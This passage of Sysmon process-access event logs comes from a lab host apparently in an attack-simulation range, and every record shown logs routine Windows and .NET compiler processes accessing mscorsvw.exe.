C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:18.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-223E-5F25-0000-00106AD70B00}","TargetProcessId":"3960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7073,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:18.695\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010A9280B00}\r\nTargetProcessId: 3300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:18.695","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010A9280B00}","TargetProcessId":"3300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7074,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:18.695\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010A9280B00}\r\nTargetProcessId: 3300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:18.695","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010A9280B00}","TargetProcessId":"3300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7075,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:18.710\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-223E-5F25-0000-0010EFDA0B00}\r\nTargetProcessId: 3300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:18.710","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-223E-5F25-0000-0010EFDA0B00}","TargetProcessId":"3300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7076,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:18.757\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010102C0B00}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:18.757","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010102C0B00}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7077,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:18.757\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010102C0B00}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:18.757","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010102C0B00}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7078,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:18.757\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010102C0B00}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:18.757","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010102C0B00}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7079,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:19.038\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-223F-5F25-0000-001049E30B00}\r\nTargetProcessId: 1572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:19.038","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-223F-5F25-0000-001049E30B00}","TargetProcessId":"1572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\